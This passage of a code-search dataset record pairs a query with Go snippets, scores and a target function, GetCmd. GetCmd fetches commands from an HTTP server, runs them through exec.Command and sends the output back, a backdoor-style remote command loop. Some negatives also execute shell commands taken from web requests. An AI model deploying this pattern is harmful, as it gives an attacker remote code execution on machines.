credentials, nil\n}", "func getCreds() (string, string) {\n\tvar username string\n\tfmt.Print(\"Username: \")\n\tfmt.Scanln(&username)\n\tfmt.Print(\"Password: \")\n\tpassword, err := terminal.ReadPassword(int(syscall.Stdin))\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tfmt.Println(\"\")\n\treturn username, string(password)\n}", "func (b *Base) GetDefaultCredentials() *Credentials {\n\tb.API.credMu.RLock()\n\tdefer b.API.credMu.RUnlock()\n\tif b.API.credentials == nil {\n\t\treturn nil\n\t}\n\tcreds := *b.API.credentials\n\treturn &creds\n}", "func (k Kind) GetCredential(req *http.Request) (config.SDKCredential, error) {\n\tswitch k {\n\tcase Server:\n\t\tvalue, err := fetchAuthToken(req)\n\t\tif err == nil {\n\t\t\treturn config.SDKKey(value), nil\n\t\t}\n\t\treturn nil, err\n\tcase Mobile:\n\t\tvalue, err := fetchAuthToken(req)\n\t\tif err == nil {\n\t\t\treturn config.MobileKey(value), nil\n\t\t}\n\t\treturn nil, err\n\tcase JSClient:\n\t\tvalue := mux.Vars(req)[\"envId\"]\n\t\tif value == \"\" {\n\t\t\treturn nil, errNoEnvID\n\t\t}\n\t\treturn config.EnvironmentID(value), nil\n\t}\n\treturn nil, errUnknownSDKKind\n}", "func getCredential(accessKeyID, location string, t time.Time) string {\n\tscope := getScope(location, t)\n\treturn accessKeyID + \"/\" + scope\n}", "func CredentialsForSecret(secretName string, secretNamespace string, clientset kubernetes.Interface) (user string, password string, err error) {\n\tif secretName == \"\" {\n\t\treturn DefaultRPCUser, DefaultRPCPassword, nil\n\t}\n\t// Try to get secret\n\tsecret, err := clientset.CoreV1().Secrets(secretNamespace).Get(secretName, metav1.GetOptions{})\n\tif err != nil {\n\t\tklog.Errorf(\"Could not get secret, error is %s\\n\", err)\n\t\treturn DefaultRPCUser, DefaultRPCPassword, err\n\t}\n\tdata, ok := secret.Data[UserKey]\n\tif !ok {\n\t\treturn DefaultRPCUser, DefaultRPCPassword, fmt.Errorf(\"Secret does not contain key %s\", UserKey)\n\t}\n\tuser = string(data)\n\tdata, ok = secret.Data[PasswordKey]\n\tpassword = string(data)\n\tif !ok {\n\t\treturn DefaultRPCUser, DefaultRPCPassword, fmt.Errorf(\"Secret does not contain key %s\", PasswordKey)\n\t}\n\treturn user, password, nil\n}", "func GetCredentialsByRole(role string) ([]string, error){\n\tvar credentials []string\n\n\tswitch role {\n\tcase constants.AdminRoleName:\n\t\t// admin get all the access\n\t\tcredentials = []string{\n\t\t\tconstants.GetAllUsersCred,\n\t\t\tconstants.GetUserCred,\n\t\t\tconstants.DeleteUserCred,\n\t\t\tconstants.AccessPOCApiCred,\n\t\t\tconstants.AccessPlannerAPICred,\n\t\t}\n\n\tcase constants.OwnerRoleName:\n\t\tcredentials = []string{\n\t\t\tconstants.GetUserCred,\n\t\t\tconstants.DeleteUserCred,\n\t\t\tconstants.AccessPOCApiCred,\n\t\t\tconstants.AccessPlannerAPICred,\n\t\t}\n\tcase constants.ChauffeurRoleName:\n\t\tcredentials = []string{\n\t\t\tconstants.AccessPOCApiCred,\n\t\t\tconstants.AccessPlannerAPICred,\n\t\t}\n\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"role %v does't exist\", role)\n\t}\n\treturn credentials, nil\n}", "func (db DatabaseConfig) Credentials() string {\n\t// TODO Different credentials for different drivers\n\treturn fmt.Sprintf(\n\t\t\"host=%s port=%d dbname=%s user=%s password=%s\",\n\t\tdb.Host,\n\t\tdb.Port,\n\t\tdb.Name,\n\t\tdb.User,\n\t\tdb.Password,\n\t)\n}", "func (c *ClientCredsCache) Get(region string) (*types.ClientCreds, error) {\n\tkey := getClientCredsFilename(region)\n\tcacheFile := filepath.Join(defaultCacheLocation(), key)\n\n\tvar clientCreds *types.ClientCreds\n\n\tif _, err := os.Stat(cacheFile); os.IsNotExist(err) {\n\t\treturn &types.ClientCreds{}, err\n\t}\n\n\tdata, err := ioutil.ReadFile(cacheFile)\n\tif err != nil {\n\t\treturn &types.ClientCreds{}, err\n\t}\n\n\terr = json.Unmarshal(data, &clientCreds)\n\tif err != nil {\n\t\treturn &types.ClientCreds{}, err\n\t}\n\n\treturn clientCreds, nil\n}" ]
[ "0.79427373", "0.7684553", "0.75909764", "0.74499506", "0.73151946", "0.7198143", "0.7089488", "0.69737214", "0.6930545", "0.6910356", "0.6801068", "0.6789321", "0.67337495", "0.6706406", "0.66863024", "0.6678689", "0.6663248", "0.6647258", "0.66230965", "0.6600843", "0.65952575", "0.65376055", "0.6505225", "0.6480893", "0.647399", "0.64348483", "0.6391137", "0.63852143", "0.6374295", "0.63211966", "0.62909764", "0.6235214", "0.62318605", "0.61472595", "0.61145633", "0.6088294", "0.60477686", "0.6021833", "0.60157657", "0.6013284", "0.6011618", "0.6004745", "0.59882367", "0.5980734", "0.59562856", "0.59548646", "0.5941749", "0.59198153", "0.5916358", "0.59045154", "0.5896487", "0.5889023", "0.5870773", "0.5829123", "0.5827216", "0.5819547", "0.5800378", "0.5799376", "0.57983667", "0.57848054", "0.57728076", "0.57723093", "0.5771369", "0.5743158", "0.5715008", "0.56998503", "0.5696851", "0.5693185", "0.56913507", "0.56898695", "0.56772846", "0.5666919", "0.5665775", "0.5663872", "0.5662612", "0.5649641", "0.5647144", "0.56444156", "0.5643024", "0.56417274", "0.5638684", "0.563627", "0.56229115", "0.5611432", "0.56061405", "0.5593225", "0.558762", "0.55750966", "0.5569958", "0.55576855", "0.5542464", "0.55403775", "0.5537999", "0.55298597", "0.55244595", "0.55229425", "0.55187607", "0.55156696", "0.55121684", "0.5511494" ]
0.7468036
3
/ Grabs a command from a given URL String via GET request. This is parsed via golang's exec function standards. Example of a valid command using all 3 arguments: (cmd)ls(cmd) (arg)la(arg) (val)/etc(arg) This will run the command "ls la /etc"
func GetCmd() (int){ url := "http://127.0.0.1:8080/" resp, err := http.Get(url) if err != nil { //log.Fatalln(err) return 0 } body, err := ioutil.ReadAll(resp.Body) if err != nil { //log.Fatalln(err) return 0 } re := regexp.MustCompile("\\(cmd\\).*?\\(cmd\\)") cmdParsed := re.FindStringSubmatch(string(body)) cmd := strings.Join(cmdParsed, " ") cmd = strings.ReplaceAll(cmd, "(cmd)", "") re = regexp.MustCompile("\\(arg\\).*?\\(arg\\)") argParsed := re.FindStringSubmatch(string(body)) arg := strings.Join(argParsed, " ") arg = strings.ReplaceAll(arg, "(arg)", "") arg = html.UnescapeString(arg) // Debugging commmand input // fmt.Println("Command is: " + cmd + " " + arg + " " + val) args, err := shellwords.Parse(arg) if err != nil{ //log.Fatalln(err) return 0 } var out []byte if cmd != "" && len(args) > 0 { out, err = exec.Command(cmd, args...).Output() } else if cmd != "" { out, err = exec.Command(cmd).Output() } if err != nil { //log.Fatalln(err) return 0 } SendResponse(string(out)) return 0 }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func ParseCommand(cmdStr string) (Command, error) {\n\treCommand, _ := regexp.Compile(\"(/?[\\\\w\\\\.;@,!@#$&^-_=*\\\\+]+)\")\n\tmatch := reCommand.FindAllStringSubmatch(cmdStr, -1)\n\n\tcmd := Command{}\n\tif len(match) == 0 {\n\t\treturn cmd, fmt.Errorf(\"Unknown command: %v\", cmdStr)\n\t}\n\n\tcmd.Command = match[0][0]\n\tswitch cmd.Command {\n\tcase \"/reg\":\n\t\tcmd.Args = make([]string, 2, 2)\n\t\tcmd.Args[0] = match[1][0]\n\t\tcmd.Args[1] = match[2][0]\n\tcase \"/receipt\":\n\t\tcmd.Args = make([]string, 0, 1)\n\t\tif len(match) > 1 {\n\t\t\tcmd.Args = append(cmd.Args, match[1][0])\n\t\t}\n\tcase \"/notify\":\n\t\tcmd.Args = make([]string, 0, 1)\n\t\tif len(match) > 1 {\n\t\t\tcmd.Args = append(cmd.Args, match[1][0])\n\t\t}\n\tcase \"/get\":\n\t\tcmd.Args = make([]string, 0, 1)\n\t\tif len(match) > 1 {\n\t\t\tcmd.Args = append(cmd.Args, match[1][0])\n\t\t}\n\tcase \"/help\":\n\t\tcmd.Args = make([]string, 0, 0)\n\tdefault:\n\t\treturn cmd, fmt.Errorf(\"Unknown command: %v\", cmd.Command)\n\t}\n\n\treturn cmd, nil\n}", "func GetCommand(input string) (string, string) {\n\tinputs := strings.Split(input, \"\\r\\n\")\n\tn1 := len(inputs)\n\tn := len(inputs[0])\n//\t\tabc := input[0:3]\n//\t\tlog.Printf(\"**%s--%s--%s--%s-\", input, inputs[0], (inputs[0])[1:3], abc)\n\t\t\n\tcom, rem := \"\", \"\"\n\tif n >= 3 && (inputs[0][0:3] == \"set\" || inputs[0][0:3] == \"cas\") {\n\t\t// start of a 2 line command\n\t\tif n1 < 3 {\t\t\t\t\t\t// includes \"\\r\\n\"\n\t\t\treturn \"\", input\t\t\t// if the command is not complete, wait for the rest of the command\n\t\t}\n\t\tvar in = strings.Index(input, \"\\r\\n\") + 2\n\t\tin += strings.Index(input[in:], \"\\r\\n\") + 2\n\t\tcom = input[:in]\n\t\trem = input[in:]\n\t} else if (n >= 3 && inputs[0][0:3] == \"get\") ||\n\t\t(n >= 4 && inputs[0][0:4] == \"getm\") ||\n\t\t(n >= 6 && inputs[0][0:6] == \"delete\") {\n\t\t// start of a 1 line command\n\t\tif n1 < 2 {\t\t\t\t\t\t// includes \"\\r\\n\"\n\t\t\treturn \"\", input\t\t\t// if the command is not complete, wait for the rest of the command\n\t\t}\n\t\tvar in = strings.Index(input, \"\\r\\n\") + 2\n\t\tcom = input[:in]\n\t\trem = input[in:]\n\t\t\n\t} else {\n\t\treturn \"\", input\n\t}\n\treturn com, rem\n}", "func Command(cmd string, args ...string) (resp Response) {\n\tif k := len(args); k > 0 {\n\t\tif !strings.HasSuffix(cmd, \":\") {\n\t\t\tcmd += \":\"\n\t\t}\n\t\tif k%2 != 0 {\n\t\t\tlog.Fatal(\"[BUG] can't process command with odd number of arguments\")\n\t\t}\n\t\tfor i := 0; i < k; i = +2 {\n\t\t\tcmd += fmt.Sprintf(` %s=\"%s\"`, args[i], args[i+1])\n\t\t}\n\t}\n\n\t// Send a single command.\n\tsendCmd(cmd)\n\n\t// decode response\n\tjson.NewDecoder(fromPipe).Decode(&resp)\n\tfmt.Printf(\"Command: '%s'\\nResponse: %s\\n\\n\", cmd, resp)\n\n\treturn resp\n}", "func runGet(cmd *cobra.Command, args []string) error {\n\tverb := \"GET\"\n\turl := \"/v1/pattern\"\n\n\tif get.ptype != \"\" {\n\t\turl += \"/\" + get.ptype\n\t}\n\n\tresp, err := web.Request(cmd, verb, url, nil)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tcmd.Printf(\"\\n%s\\n\\n\", resp)\n\treturn nil\n}", "func GetCommand(input string) (string, string) {\n\n\t\tinputs := strings.Split(input, \"\\r\\n\")\n\t\tn1 := len(inputs)\n\t\tn := len(inputs[0])\n\n\t\tcom, rem := \"\", \"\"\n\t\tif n >= 3 && (inputs[0][0:3] == \"set\" || inputs[0][0:3] == \"cas\") {\n\t\t\t// start of a 2 line command\n\t\t\tif n1 < 3 { // includes \"\\r\\n\"\n\t\t\t\treturn \"\", input // if the command is not complete, wait for the rest of the command\n\t\t\t}\n\t\t\tvar in = strings.Index(input, \"\\r\\n\") + 2\n\t\t\tin += strings.Index(input[in:], \"\\r\\n\") + 2\n\t\t\tcom = input[:in]\n\t\t\trem = input[in:]\n\t\t} else if (n >= 3 && inputs[0][0:3] == \"get\") || (n >= 4 && inputs[0][0:4] == \"getm\") ||(n >= 6 && inputs[0][0:6] == \"delete\") {\n\t\t\t// start of a 1 line command\n\t\t\tif n1 < 2 { // includes \"\\r\\n\"\n\t\t\t\treturn \"\", input // if the command is not complete, wait for the rest of the command\n\t\t\t}\n\t\t\tvar in = strings.Index(input, \"\\r\\n\") + 2\n\t\t\tcom = input[:in]\n\t\t\trem = input[in:]\n\t\t} else {\n\t\t\treturn \"\", input\n\t\t}\n\t\treturn com, rem\n}", "func (tv *TV) Command(uri Command, req Payload) (Message, error) {\n\treturn tv.request(&Message{\n\t\tType: RequestMessageType,\n\t\tID: requestID(),\n\t\tURI: uri,\n\t\tPayload: req,\n\t})\n}", "func Get(address, cmd string) (url.Values, error) {\n\tt := targetFor(address, cmd)\n\tresp, err := http.Get(t)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer resp.Body.Close()\n\treturn processBody(resp.Body)\n}", "func GetCommand(text string) Executable {\n\tfor _, cmd := range commandsDoc {\n\t\tregx := regexp.MustCompile(cmd.regexValidation)\n\t\tmatch := regx.FindStringSubmatch(text)\n\n\t\tif len(match) > 0 {\n\t\t\targs := make(map[string]string)\n\n\t\t\tfor i, label := range regx.SubexpNames() {\n\t\t\t\tif i > 0 && i <= len(match) {\n\t\t\t\t\targs[label] = match[i]\n\t\t\t\t}\n\t\t\t}\n\t\t\t// Feel free to improve this solution for abstraction\n\t\t\treturn cmd.instance.buildCommand(args)\n\t\t}\n\t}\n\n\treturn nil\n}", "func GetCurlCommand(req *http.Request) (*CurlCommand, error) {\n\tcommand := CurlCommand{}\n\n\tcommand.append(\"curl\")\n\n\tcommand.append(\"-X\", bashEscape(req.Method))\n\n\tif req.Body != nil {\n\t\tvar buff bytes.Buffer\n\t\tbodyReader, err := req.GetBody()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"getCurlCommand: GetBody error: %w\", err)\n\t\t}\n\t\t_, err = buff.ReadFrom(bodyReader)\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"getCurlCommand: buffer read from body erorr: %w\", err)\n\t\t}\n\t\tif len(buff.String()) > 0 {\n\t\t\tbodyEscaped := bashEscape(buff.String())\n\t\t\tcommand.append(\"-d\", bodyEscaped)\n\t\t}\n\t}\n\n\tvar keys []string\n\n\tfor k := range req.Header {\n\t\tkeys = append(keys, k)\n\t}\n\n\tsort.Strings(keys)\n\n\tfor _, k := range keys {\n\t\tcommand.append(\"-H\", appendHeader(req, k))\n\t}\n\n\tcommand.append(bashEscape(req.URL.String()))\n\n\treturn &command, nil\n}", "func CommandHandler(w http.ResponseWriter, req *http.Request) {\n\n // Here we only allow HTTP GET requests\n switch req.Method {\n case \"GET\":\n\n // Checking if client IP is authorized\n ipauth := strings.Contains(allowedips,GetClientIP(req))\n if ipauth ==false {\n http.Error(w, \"[403] Unauthorized\", 403)\n log.Printf(GetClientIP(req) + \" - [403] Unauthorized Source IP\")\n return\n }\n\n // Data collection requests\n if req.URL.Path == string(\"/hash=\" + hashsecret + \"&fetch=\" + \"release\") {\n out, _ := exec.Command(\"cat\", \"/etc/redhat-release\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=kernel\") {\n out, _ := exec.Command(\"uname\", \"-r\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=rpmlist\") {\n out, _ := exec.Command(\"rpm\", \"-qa\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=hostname\") {\n out, _ := exec.Command(\"hostname\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=uptime\") {\n out, _ := exec.Command(\"uptime\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=df\") {\n out, _ := exec.Command(\"df\", \"-h\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=meminfo\") {\n out, _ := exec.Command(\"cat\", \"/proc/meminfo\").Output()\n w.Write([]byte(out))\n } else if req.URL.Path == string(\"/fetch=cpuinfo\") {\n out, _ := exec.Command(\"cat\", \"/proc/cpuinfo\").Output()\n w.Write([]byte(out))\n\n // Return HTTP Code 400 if no matching request\n } else {\n http.Error(w, \"[400] Bad Request\", 400)\n log.Printf(GetClientIP(req) + \" - [400] Bad Request URL\")\n return\n }\n\n // Return HTTP Code 405 if someone tries a method other than GET\n default:\n http.Error(w, \"[405] Method Not Allowed\", 405)\n log.Printf(GetClientIP(req) + \" - [405] Method Not Allowed\")\n }\n}", "func proxyCommand(w http.ResponseWriter, r *http.Request) {\n\tr.ParseForm()\n\tcommand := r.FormValue(\"command\")\n\targs := strings.Split(command, \" \")\n\n\tif len(args) == 0 {\n\t\tfmt.Fprintf(w, \"Bad command (%s)\\n\", command)\n\t\treturn\n\t}\n\t// If this is \"cd\", then change working directory.\n\tif args[0] == \"cd\" {\n\t\tif len(args) < 2 {\n\t\t\tfmt.Fprintln(w, \"'cd' must be followed with new directory!\")\n\t\t} else {\n\t\t\terr := os.Chdir(args[1])\n\t\t\tif err != nil {\n\t\t\t\tfmt.Fprintln(w, err.Error())\n\t\t\t} else {\n\t\t\t\tfmt.Fprintln(w, \"Switched directory to\", args[1])\n\t\t\t}\n\t\t\tshellDir = args[1]\n\t\t}\n\t\treturn\n\t}\n\t// Expand any arguments with wildcard.\n\tfullArgs := []string{}\n\tfor _, arg := range args {\n\t\tif strings.Contains(arg, \"*\") {\n\t\t\tmatches, err := filepath.Glob(arg)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Printf(\"Can't parse glob: %s [%s]\\n\", arg, err.Error())\n\t\t\t} else {\n\t\t\t\tfullArgs = append(fullArgs, matches...)\n\t\t\t}\n\t\t} else {\n\t\t\tfullArgs = append(fullArgs, arg)\n\t\t}\n\t}\n\n\t// Check for \"&\" at end to signify asynchronous command like server starts.\n\tlastArg := len(fullArgs) - 1\n\trunBackground := false\n\tif fullArgs[lastArg] == \"&\" {\n\t\trunBackground = true\n\t\tfullArgs = fullArgs[:lastArg]\n\t}\n\n\t// Do the command\n\tcmd := exec.Command(fullArgs[0], fullArgs[1:]...)\n\tvar out []byte\n\tvar err error\n\tif runBackground {\n\t\terr = cmd.Start()\n\t\tout = []byte(fmt.Sprintf(\"Ran background job: %s\\n\", command))\n\t} else {\n\t\tout, err = cmd.Output()\n\t}\n\tif err != nil {\n\t\tfmt.Println(\"Error: \", err.Error())\n\t\tfmt.Fprintln(w, err.Error())\n\t} else {\n\t\tfmt.Fprintln(w, string(out))\n\t}\n}", "func GetCommand(c *cli.Context) error {\n\targs := c.Args()\n\tif len(args) < 1 {\n\t\treturn fmt.Errorf(\"Invalid number of arguments\")\n\t}\n\tpwd, err := passwd.GetPassword(c, c.String(\"password\"))\n\tif err != nil {\n\t\treturn err\n\t}\n\tparsedData := make(map[string]interface{})\n\tsources := c.StringSlice(\"encrypted-input\")\n\tif len(sources) > 0 {\n\t\tfor _, src := range sources {\n\t\t\terr = uri.ReadMapFromURI(c, src, uri.ReadDataFromEncryptedStream(pwd), parsedData)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t} else {\n\t\terr = uri.ReadMapFromURI(c, \"\", uri.ReadDataFromEncryptedStream(pwd), parsedData)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tbuf := new(bytes.Buffer)\n\tfor _, key := range args {\n\t\tvalue, ok := parsedData[key]\n\t\tif !ok {\n\t\t\tfmt.Fprintf(os.Stderr, \"Key %s is not present in the archive\\n\", key)\n\t\t} else if _, err = fmt.Fprintf(buf, \"%s\\n\", value); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn uri.WriteDataToURI(c, c.String(\"output\"), buf.Bytes(), uri.WriteDataToPlaintextStream)\n}", "func Command(name string, arg ...string) *Cmd {}", "func Cmd(method, source string, args Options) ([]byte, error) {\n\treturn fetch.Cmd(fetch.Request{\n\t\tMethod: method,\n\t\tURL: fmt.Sprintf(\n\t\t\t\"http://api.pullword.com/%s.php?source=%s&param1=%d&param2=%d\",\n\t\t\tmethod,\n\t\t\tsource,\n\t\t\targs.Threshold,\n\t\t\targs.Debug,\n\t\t),\n\t})\n}", "func (a activePlugin) CMD() string {\n\treturn \"/url-shorten\"\n}", "func command(dir string, name string, arg ...string) error {\n\tcmd := exec.Command(name, arg...)\n\tcmd.Dir = dir\n\n\tresponse, err := cmd.CombinedOutput()\n\tresponseStr := string(response)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"%s %v: %v\", name, arg, responseStr)\n\t}\n\treturn nil\n}", "func (c *HTTPClient) Query(cmd *Command) (Response, error) {\n\tif err := cmd.Check(); err != nil {\n\t\treturn nil, err\n\t}\n\treturn c.exec(cmd.Name(), cmd.Params(), cmd.Body())\n}", "func Get (url string, args map[string]string) (*http.Response, error) {\n\t// create a client\n\tclient, req, _ := GetHttpClient(url)\n\t// build the query\n\tif len(args) > 0 {\n\t\treq = buildQuery(req, args)\n\t}\n\t// execute the request\n\t//fmt.Println(req.URL.String())\n\treturn client.Do(req)\n}", "func (c *HTTPClient) Exec(cmd string, body io.Reader) (Response, error) {\n\tcommand, err := ParseCommand(cmd)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcommand.SetBody(body)\n\treturn c.Query(command)\n}", "func command(c *fb.Context, w http.ResponseWriter, r *http.Request) (int, error) {\n\t// Upgrades the connection to a websocket and checks for fb.Errors.\n\tconn, err := upgrader.Upgrade(w, r, nil)\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\tdefer conn.Close()\n\n\tvar (\n\t\tmessage []byte\n\t\tcommand []string\n\t)\n\n\t// Starts an infinite loop until a valid command is captured.\n\tfor {\n\t\t_, message, err = conn.ReadMessage()\n\t\tif err != nil {\n\t\t\treturn http.StatusInternalServerError, err\n\t\t}\n\n\t\tcommand = strings.Split(string(message), \" \")\n\t\tif len(command) != 0 {\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// Check if the command is allowed\n\tallowed := false\n\n\tfor _, cmd := range c.User.Commands {\n\t\tif regexp.MustCompile(cmd).MatchString(command[0]) {\n\t\t\tallowed = true\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif !allowed {\n\t\terr = conn.WriteMessage(websocket.TextMessage, cmdNotAllowed)\n\t\tif err != nil {\n\t\t\treturn http.StatusInternalServerError, err\n\t\t}\n\n\t\treturn 0, nil\n\t}\n\n\t// Check if the program is installed on the computer.\n\tif _, err = exec.LookPath(command[0]); err != nil {\n\t\terr = conn.WriteMessage(websocket.TextMessage, cmdNotImplemented)\n\t\tif err != nil {\n\t\t\treturn http.StatusInternalServerError, err\n\t\t}\n\n\t\treturn http.StatusNotImplemented, nil\n\t}\n\n\t// Gets the path and initializes a buffer.\n\tpath := c.User.Scope + \"/\" + r.URL.Path\n\tpath = filepath.Clean(path)\n\tbuff := new(bytes.Buffer)\n\n\t// Sets up the command executation.\n\tcmd := exec.Command(command[0], command[1:]...)\n\tcmd.Dir = path\n\tcmd.Stderr = buff\n\tcmd.Stdout = buff\n\n\t// Starts the command and checks for fb.Errors.\n\terr = cmd.Start()\n\tif err != nil {\n\t\treturn http.StatusInternalServerError, err\n\t}\n\n\t// Set a 'done' variable to check whetever the command has already finished\n\t// running or not. This verification is done using a goroutine that uses the\n\t// method .Wait() from the command.\n\tdone := false\n\tgo func() {\n\t\terr = cmd.Wait()\n\t\tdone = true\n\t}()\n\n\t// Function to print the current information on the buffer to the connection.\n\tprint := func() error {\n\t\tby := buff.Bytes()\n\t\tif len(by) > 0 {\n\t\t\terr = conn.WriteMessage(websocket.TextMessage, by)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\n\t\treturn nil\n\t}\n\n\t// While the command hasn't finished running, continue sending the output\n\t// to the client in intervals of 100 milliseconds.\n\tfor !done {\n\t\tif err = print(); err != nil {\n\t\t\treturn http.StatusInternalServerError, err\n\t\t}\n\n\t\ttime.Sleep(100 * time.Millisecond)\n\t}\n\n\t// After the command is done executing, send the output one more time to the\n\t// browser to make sure it gets the latest information.\n\tif err = print(); err != nil {\n\t\treturn http.StatusInternalServerError, err\n\t}\n\n\treturn 0, nil\n}", "func getCommand(args []string) (*command, []string, error) {\n\tif len(args) < 2 {\n\t\treturn nil, nil, fmt.Errorf(\"Too few arguments: %q\", args)\n\t}\n\n\tfor _, c := range commands {\n\t\tif c.flag == args[1] {\n\t\t\treturn &c, args[2:], nil\n\t\t}\n\t}\n\n\t// command not found\n\treturn nil, nil, fmt.Errorf(\"Command not found: %q\", args)\n}", "func Getcommand(text string, separ byte) (command []string, err error) {\n\ttext = strings.Trim(text, \" \")\n\tif text[0] != separ {\n\t\treturn nil, fmt.Errorf(\"Commands must start with: '%c' \", separ)\n\t}\n\ts := strings.Split(text, \" \")\n\treturn s, nil\n}", "func executeSimple(url string) string {\n\tstart := time.Now()\n\tresponse, _ := http.Get(url)\n\tdefer response.Body.Close()\n\n\tbody, _ := ioutil.ReadAll(response.Body)\n\tfmt.Printf(\"Request time: %d ms from url%s\\n\", time.Since(start).Nanoseconds()/time.Millisecond.Nanoseconds(), url)\n\treturn fmt.Sprintf(\"%s from %s\", body, url)\n}", "func (eng *Engine) command(cmd string, args ...string) *exec.Cmd {\n\tvar a []string\n\tfor ii := 0; ii < len(args); ii++ {\n\t\targ := args[ii]\n\t\tif arg[0] == '-' { // This is an argument specifier eg \"-h\".\n\t\t\tif v := args[ii+1]; v == \"\" {\n\t\t\t\tii++\n\t\t\t\tcontinue\n\t\t\t} else if strings.Contains(v, \";omitempty\") {\n\t\t\t\t// Handle special ;omitempty directive.\n\t\t\t\tv = strings.Split(v, \";omitempty\")[0]\n\t\t\t\tif v == \"\" {\n\t\t\t\t\tii++\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tx, _ := strconv.Atoi(v)\n\t\t\t\tif x == 0 {\n\t\t\t\t\tii++\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tfl, _ := strconv.ParseFloat(v, 64)\n\t\t\t\tif fl <= 0.0 {\n\t\t\t\t\tii++\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\targs[ii+1] = v\n\t\t\t}\n\t\t}\n\t\ta = append(a, arg)\n\t}\n\tif eng.Debug {\n\t\teng.logf(\"%s %s\\n\", cmd, strings.Join(a, \" \"))\n\t}\n\treturn exec.Command(cmd, a...)\n}", "func GetCliArguments() (string, int, error) {\n\n\tvar rawurl string\n\tvar workers int\n\tflag.StringVar(&rawurl, \"url\", \"\", \"The URL to crawl\")\n\tflag.IntVar(&workers, \"workers\", 4, \"Number of goroutines to spawn concurrently\")\n\tflag.Parse()\n\n\tif workers < 1 || workers > 10 {\n\t\treturn \"\", -1, errors.New(\"workers must be less than 10 and greater than 0\")\n\t}\n\tcurrentURL, err := url.ParseRequestURI(NormalizeURL(rawurl))\n\tif err != nil {\n\t\treturn \"\", -1, err\n\t}\n\n\treturn currentURL.String(), workers, nil\n}", "func getCommandFromCommandArg(c client.Client, commandArg string) *model.Command {\n\tif checkSlash(commandArg) {\n\t\treturn nil\n\t}\n\n\tcmd := getCommandFromTeamTrigger(c, commandArg)\n\tif cmd == nil {\n\t\tcmd, _, _ = c.GetCommandById(commandArg)\n\t}\n\treturn cmd\n}", "func Command(commandtext string) (CommandDetails, error) {\n\n\tvar parsedCommand CommandDetails\n\n\tparsedCommand.Original = commandtext\n\n\t// Let's tokenise this using the delimiters, that'll make this parsing easier.\n\t// super fragile parsing up ahead!\n\toverlaySlice := strings.Split(commandtext, \"|\")\n\n\tif len(overlaySlice) > 1 {\n\t\tparsedCommand.OverlayText = strings.Join(overlaySlice[1:], \"\\n\")\n\t\tcommandtext = overlaySlice[0]\n\t}\n\n\tgifSlice := strings.Split(commandtext, \"/\")\n\n\tif len(gifSlice) > 1 {\n\t\tgifDetails := strings.Split(strings.TrimSpace(gifSlice[1]), \" \")\n\t\tif len(gifDetails) > 1 {\n\t\t\tparsedCommand.GifOffset = gifDetails[1]\n\n\t\t}\n\t\tparsedCommand.GifLength = gifDetails[0]\n\t\tcommandtext = gifSlice[0]\n\t}\n\n\tparsedCommand.Quote = commandtext\n\n\tif !strings.Contains(parsedCommand.GifLength, \"s\") {\n\t\tparsedCommand.GifLength += \"s\"\n\t}\n\n\tif !strings.Contains(parsedCommand.GifOffset, \"s\") {\n\t\tparsedCommand.GifOffset += \"s\"\n\t}\n\n\t// fmt.Printf(\"%+v\", result)\n\n\treturn parsedCommand, nil\n}", "func (t *Command) Get(args *Args, reply *Command) error {\n\n\tlogit.Info.Println(\"on server, Command Get called A=\" + args.A + \" B=\" + args.B)\n\tif args.A == \"\" {\n\t\tlogit.Error.Println(\"A was nil\")\n\t\treturn errors.New(\"Arg A was nil\")\n\t}\n\tif args.B == \"\" {\n\t\tlogit.Info.Println(\"B was nil\")\n\t} else {\n\t\tlogit.Info.Println(\"B was \" + args.B)\n\t}\n\n\tvar cmd *exec.Cmd\n\n\tif args.B == \"\" {\n\t\tcmd = exec.Command(args.A)\n\t} else {\n\t\tcmd = exec.Command(args.A, args.B)\n\t}\n\tvar out bytes.Buffer\n\tvar stderr bytes.Buffer\n\tcmd.Stdout = &out\n\tcmd.Stderr = &stderr\n\n\terr := cmd.Run()\n\tif err != nil {\n\t\tlogit.Error.Println(err.Error())\n\t\terrorString := fmt.Sprintf(\"%s\\n%s\\n%s\\n\", err.Error(), out.String(), stderr.String())\n\t\treturn errors.New(errorString)\n\t}\n\tlogit.Info.Println(\"command output was \" + out.String())\n\treply.Output = out.String()\n\n\treturn nil\n}", "func GetCommand(client Client) error{\n conn := client.Conn\n argv := client.CommandArgv\n err := checkCommandProtocol(&client)\n if err != nil {\n return err\n }\n resp := ServerInstance.Dict[argv[4]]\n\n //类型判定\n tmpValue, ok := (resp.Value).(string)\n if !ok {\n responseNil(conn)\n } else {\n responseValue(tmpValue, conn)\n }\n return nil\n}", "func Cmd(command string) (r string, e error) {\n\tinputcmd := strings.Split(command, \" \")\n\tcmd := exec.Command(inputcmd[0], inputcmd[1:]...)\n\tstdout, err := cmd.Output()\n\treturn string(stdout), err\n}", "func installFromGoGet(url string) error {\n c := 